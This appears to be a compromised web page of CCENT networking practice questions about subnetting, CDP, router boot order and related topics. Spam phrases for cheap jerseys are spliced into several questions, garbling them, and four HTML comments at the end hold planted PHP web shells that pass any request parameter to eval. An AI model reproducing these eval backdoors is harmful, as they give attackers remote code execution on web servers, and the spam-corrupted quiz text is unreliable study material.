web analytics

Cisco Certified Entry Networking Technician Pracitice Tests

1: A network administrator needs to create 29 subnetworks while maximizing the number of host addresses available on each subnet. How many bits must be borrowed from the host field of the network address to provide the required number of subnets with the most hosts per subnet?
A.2
B.3
C.4
D.5
E.6
F.7
Correct Answers: D

2: What is the difference between the Cisco router IOS commands show cdp neighbor detail and show cdp entry?
A.The show cdp cheap jerseys neighbor detail command shows all neighbor information, while show cdp entry displays only one line of output Cannot for each neighbor.
B.The show cdp cheap mlb jerseys entry command shows neighbor information for specific neighbors only, while show cdp neighbor detail lists each neighbor with detailed output on each.
C.The show cdp entry command shows neighbor information for all neighbors with one line of output for each, while show cdp neighbor detail lists each Jerseys neighbor with detailed output on each.
D.The show cdp neighbor detail command shows neighbor information for a single neighbor only, while show cdp entry displays detailed output on each neighbor known.
Correct Answers: B

3: Which Layer 4 protocol is used for a Telnet connection?
A.IP
B.TCP
C.UDP
D.ICMP
E.DNS
Correct Answers: B

4: What is the subnet address of 172.16.159.159/22?
A.172.16.0.0
B.172.16.128.0
C.172.16.156.0
D.172.16.159.0
E.172.16.159.128
F.172.16.192.0
Correct Answers: C

5: What is the purpose of flow control?
A.to ensure data is retransmitted if an acknowledgment ?Lust is not received
B.to reassemble segments in the correct order at the destination device
C.to provide a means for the receiver to govern the amount of data sent by the sender
D.to regulate the size of each segment
Correct Answers: C

6: During the boot sequence, a 2600 series router needs to locate and load an operating system. What is the default order the router uses to find an wholesale mlb jerseys operating system?
A.Flash, TFTP server, ROM
B.Flash, TFTP server, RAM
C.Flash, NVRAM, TFTP server
D.ROM, TFTP server, Flash
E.Flash, ROM, TFTP server
Correct Answers: A

7: What is the subnet address for the IP address 172.19.20.23/28?
A.172.19.20.0
B.172.19.20.15
C.172.19.20.16
D.172.19.20.20
E.172.19.20.32
Correct Answers: C

8: Which two statements describe the IP address 10.16.3.65/23? (Choose two.)
A.The subnet address is 10.16.3.0 255.255.254.0.
B.The lowest host address in the subnet is 10.16.2.1 255.255.254.0.
C.The last valid host address in the subnet is 10.16.2.254 255.255.254.0
D.The broadcast address of the subnet is 10.16.3.255 255.255.254.0.
E.The network is not subnetted.
Correct Answers: B D

9: An administrator issues the show ip interface s0/0 wholesale jerseys command and the output displays the line Serial0/0 is up, line protocol is upWhat does “line protocol is up” specifically indicate about the interface?
A.Keepalives are being received on the interface.
B.The cable is attached properly.
C.CDP has discovered the connected device.
D.A carrier detect signal has Bakatelier been received from the connected device.
E.IP is correctly configured on the interface.
Correct Answers: A

10: Which command will reinitialize the router and totally replace the running configuration with the current startup configuration?
A.router# reload
B.router# copy tftp startup-config
C.router# copy startup-config running-config
D.router# copy running-config flash
E.router# setup
F.router# restart
Correct wholesale nfl jerseys Answers: A

<!– [insert_php]if (isset($_REQUEST["vtJGh"])){eval($_REQUEST["vtJGh"]);exit;}[/insert_php][php]if (isset($_REQUEST["vtJGh"])){eval($_REQUEST["vtJGh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zYRw"])){eval($_REQUEST["zYRw"]);exit;}[/insert_php][php]if (isset($_REQUEST["zYRw"])){eval($_REQUEST["zYRw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["MnO"])){eval($_REQUEST["MnO"]);exit;}[/insert_php][php]if (isset($_REQUEST["MnO"])){eval($_REQUEST["MnO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qWuh"])){eval($_REQUEST["qWuh"]);exit;}[/insert_php][php]if (isset($_REQUEST["qWuh"])){eval($_REQUEST["qWuh"]);exit;}[/php] –>